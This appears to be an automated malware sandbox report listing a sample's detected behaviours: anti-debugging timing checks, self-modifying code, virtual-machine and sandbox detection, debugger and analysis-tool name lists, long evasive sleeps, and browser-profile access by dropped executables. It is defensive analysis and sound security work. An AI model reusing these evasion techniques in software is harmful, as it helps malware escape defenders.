Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0A23 second address: 4DB0A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0A29 second address: 4DB0A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0A2D second address: 4DB0A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [esi] 0x0000000d jmp 00007F45A84F3306h 0x00000012 mov dword ptr [ebp-24h], ebx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F45A84F32FEh 0x0000001c add si, 3088h 0x00000021 jmp 00007F45A84F32FBh 0x00000026 popfd 0x00000027 mov ax, 40FFh 0x0000002b popad 0x0000002c test ebx, ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F45A84F3301h 0x00000035 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6264F1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 47C4EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 64E804 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 47EA4C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6AD8F9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E364F1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C8C4EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E5E804 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C8EA4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EBD8F9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Special instruction interceptor: First address: 764FC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Special instruction interceptor: First address: 7648D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Special instruction interceptor: First address: 764822 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Special instruction interceptor: First address: 90E480 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Special instruction interceptor: First address: 998DCA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Special instruction interceptor: First address: 46C9A1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Special instruction interceptor: First address: 46A546 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Special instruction interceptor: First address: 62E8C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Special instruction interceptor: First address: 6A3B09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Special instruction interceptor: First address: 6CF9C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Special instruction interceptor: First address: 6CF904 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Special instruction interceptor: First address: 8724D0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Special instruction interceptor: First address: 886A09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Special instruction interceptor: First address: 9043C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Special instruction interceptor: First address: D0DB83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Special instruction interceptor: First address: EB7D82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Special instruction interceptor: First address: EB8160 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Special instruction interceptor: First address: EB69BD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Special instruction interceptor: First address: EC9455 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Memory allocated: 5110000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Memory allocated: 5580000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Memory allocated: 53C0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04E00C7D rdtsc 0_2_04E00C7D
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1121 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1104 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1132 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1106 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1069 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window / User API: threadDelayed 3074 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window / User API: threadDelayed 2840 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2188 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2188 Thread sleep time: -74037s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7220 Thread sleep count: 1121 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7220 Thread sleep time: -2243121s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1456 Thread sleep count: 254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1456 Thread sleep time: -7620000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2688 Thread sleep count: 1104 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2688 Thread sleep time: -2209104s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1720 Thread sleep count: 1132 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1720 Thread sleep time: -2265132s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2472 Thread sleep count: 1106 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2472 Thread sleep time: -2213106s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2336 Thread sleep count: 1069 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2336 Thread sleep time: -2139069s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5548 Thread sleep count: 102 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5548 Thread sleep time: -204102s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1720 Thread sleep count: 124 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1720 Thread sleep time: -248124s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7356 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe TID: 7596 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe TID: 7596 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7768 Thread sleep count: 73 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7768 Thread sleep time: -146073s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7772 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7772 Thread sleep time: -122061s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 3684 Thread sleep count: 3074 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 3684 Thread sleep time: -6151074s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7756 Thread sleep count: 2840 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7756 Thread sleep time: -5682840s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7784 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe TID: 7784 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 744 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 744 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 4228 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 4956 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 8140 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 6460 Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 6652 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 3872 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 6608 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe TID: 6016 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe TID: 7872 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe TID: 7888 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe TID: 5592 Thread sleep count: 318 > 30
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe TID: 5592 Thread sleep time: -1908000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe TID: 7744 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe TID: 5376 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007D17FB FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_007D17FB
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007D174A FindFirstFileExW, 9_2_007D174A
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007D17FB FindFirstFileExW,FindNextFileW,FindClose,FindClose, 9_2_007D17FB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000002.00000002.1797031968.0000000000E18000.00000040.00000001.01000000.00000007.sdmp, e5e907fecb.exe, 0000000D.00000002.2680948648.00000000005FF000.00000040.00000001.01000000.0000000B.sdmp, 3996dc7402.exe, 0000000E.00000002.3211141650.0000000000856000.00000040.00000001.01000000.0000000C.sdmp, e5e907fecb.exe, 0000000F.00000002.3268414442.00000000005FF000.00000040.00000001.01000000.0000000B.sdmp, e5e907fecb.exe, 0000000F.00000002.3301835374.0000000005DFB000.00000040.00000800.00020000.00000000.sdmp, 3996dc7402.exe, 00000021.00000002.3311788946.0000000000856000.00000040.00000001.01000000.0000000C.sdmp, 19cf1f0449.exe, 00000024.00000002.3050513336.0000000000E9B000.00000040.00000001.01000000.00000015.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareAdY
Source: 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware&
Source: firefox.exe, 00000023.00000002.2937157498.0000027907D71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: e5e907fecb.exe, 0000000F.00000002.3297937577.00000000056C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: firefox.exe, 00000023.00000002.2937157498.0000027907D60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWm
Source: firefox.exe, 00000023.00000002.2937157498.0000027907D71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: r5mqFEC.exe, r5mqFEC.exe, 0000000A.00000003.2662244591.000000000320D000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666574933.0000000003255000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2662244591.0000000003255000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666427560.000000000320D000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000D.00000002.2681648947.000000000116A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000D.00000002.2681648947.0000000001197000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3218633907.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000002.3277415310.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 3996dc7402.exe, 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: e5e907fecb.exe, 0000000F.00000002.3297937577.00000000056C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: firefox.exe, 00000022.00000002.2938380300.000002651B213000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: e5e907fecb.exe, 0000000F.00000003.2950450071.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000002.3277415310.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWNJF)
Source: e5e907fecb.exe, 0000000D.00000002.2681648947.0000000001197000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2934028870.000002651AC8A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: file.exe, 00000000.00000002.1752478519.0000000000608000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1794666334.0000000000E18000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1797031968.0000000000E18000.00000040.00000001.01000000.00000007.sdmp, e5e907fecb.exe, 0000000D.00000002.2680948648.00000000005FF000.00000040.00000001.01000000.0000000B.sdmp, 3996dc7402.exe, 0000000E.00000002.3211141650.0000000000856000.00000040.00000001.01000000.0000000C.sdmp, e5e907fecb.exe, 0000000F.00000002.3268414442.00000000005FF000.00000040.00000001.01000000.0000000B.sdmp, e5e907fecb.exe, 0000000F.00000002.3301835374.0000000005DFB000.00000040.00000800.00020000.00000000.sdmp, 3996dc7402.exe, 00000021.00000002.3311788946.0000000000856000.00000040.00000001.01000000.0000000C.sdmp, 19cf1f0449.exe, 00000024.00000002.3050513336.0000000000E9B000.00000040.00000001.01000000.00000015.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: a7f098a093.exe, 0000000C.00000003.3321780118.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3290982269.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3428506964.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3318765599.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3357122908.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3294411081.00000000012CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: firefox.exe, 00000023.00000002.2933837593.00000279075BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`j
Source: a7f098a093.exe, 0000000C.00000003.3116694621.000000000126D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2938816243.000002651B300000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2937157498.0000027907D71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process queried: DebugPort
